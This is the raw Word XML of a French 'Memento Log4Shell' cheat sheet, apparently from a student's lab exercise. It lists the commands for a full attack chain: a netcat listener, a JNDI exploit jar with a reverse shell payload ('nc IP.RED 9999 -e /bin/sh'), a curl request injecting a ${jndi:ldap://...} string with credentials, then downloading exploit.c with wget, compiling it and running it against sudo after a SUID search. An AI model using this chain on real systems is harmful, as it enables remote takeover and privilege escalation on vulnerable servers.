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9E9C7" w14:textId="20F703DA" w:rsidR="001068B6" w:rsidRDefault="00D1640B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2"/>
          <w:tab w:val="center" w:pos="7923"/>
          <w:tab w:val="center" w:pos="8643"/>
          <w:tab w:val="center" w:pos="9759"/>
        </w:tabs>
        <w:spacing w:after="227"/>
        <w:ind w:left="-15" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRIDAY </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Maël</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00000000"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BUT3cyB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A3D80" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="218" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB638E8" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="420" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF4C23" w14:textId="0DC1EB49" w:rsidR="001068B6" w:rsidRPr="00D1640B" w:rsidRDefault="00000000" w:rsidP="00D1640B">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Memento Log4Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18CEED" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="218" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="67" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C74FCF" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="218" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="67" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D9FC1" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="180"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Démarrer un serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en mode écoute sur le port 9999  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F663C9" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="137" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2411" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="109C4246" wp14:editId="55A729DB">
            <wp:extent cx="5071745" cy="130111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5F0A76" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="237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 w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9999</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55210EAF" w14:textId="7DA00469" w:rsidR="001068B6" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="9"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t>Lancer le .</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>jar  «</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar</w:t>
      </w:r>
      <w:r>
        <w:t> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D23CA" w14:textId="74096D7D" w:rsidR="001068B6" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="136" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DF999B0" wp14:editId="5DB11FCB">
            <wp:extent cx="6637020" cy="3058795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="131161203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12039" name="Image 1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49302E0" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="241" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5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F4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP.RED 9999 -e /bin/sh" -A IP.RED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621D90B" w14:textId="77777777" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="241" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9FBE8D" w14:textId="77777777" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="241" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E0D399" w14:textId="77777777" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="241" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E24D60" w14:textId="3082A6E7" w:rsidR="001068B6" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="177"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On récupère le mot de passe grâce à 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="183E915B" w14:textId="320C5B27" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17" w:rsidP="00DF4D17">
      <w:pPr>
        <w:spacing w:after="177"/>
        <w:ind w:left="326" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A330FE0" wp14:editId="43FBFA46">
            <wp:extent cx="6637020" cy="4614545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169608963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20E2" w14:textId="08CFC3E2" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="177"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t>Puis on lance sur la commande sur la page web. Un « Hello World » apparait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF3B68" w14:textId="79FC6102" w:rsidR="001068B6" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="93" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20EFF164" wp14:editId="4DBA2A7A">
            <wp:extent cx="6629400" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="78088798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E97E72D" w14:textId="7FD223BC" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="0" w:line="259"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Commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test:genius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -e '${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">://10.1.111.37:1389/rqz8rt}' </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00DF4D17">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://www.prosecur.sae:80/developers/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17850637" w14:textId="77777777" w:rsidR="00DF4D17" w:rsidRDefault="00DF4D17">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A62CF53" w14:textId="37BAE236" w:rsidR="001068B6" w:rsidRDefault="00000000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4BB88E13" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="176"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accéder à l'onglet avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en mode écoute. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F5077" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="122" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2089" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B96519" wp14:editId="4B6836BD">
            <wp:extent cx="5276215" cy="252984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2E855F" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C7347" w14:textId="58DAF8E1" w:rsidR="001068B6" w:rsidRDefault="00000000" w:rsidP="00DF4D17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sur Kali, lancer un serveur web en Python  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F22FD" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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F4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E2699" w14:textId="77ED728D" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="189"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se placer dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour pouvoir effectuer un </w:t>
      </w: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http://IP.RED:8000/exploit.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87F006" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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 w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://IP.RED:8000/exploit.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FC4DD" w14:textId="68CB73C2" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compiler </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec GCC. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46000BFB" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2AD95F" wp14:editId="58E21DC7">
            <wp:extent cx="1149350" cy="25908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D870C8" w14:textId="77777777" w:rsidR="001068B6" w:rsidRPr="00DF4D17" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr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 w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B5EE8" w14:textId="7DE71994" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Après compilation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DF4D17">
        <w:t>on doit récupérer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un binaire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et l'exécuter dans un dossier disposant d'un SUID. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24B13D" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2929" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759D3654" wp14:editId="2B3A28F5">
            <wp:extent cx="4742815" cy="137160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B04B86" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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 w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> / -perm -4000 2&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E2FC5" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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F4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>a.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4D17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B551C" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="174" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4CE406" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="179" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD46D47" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
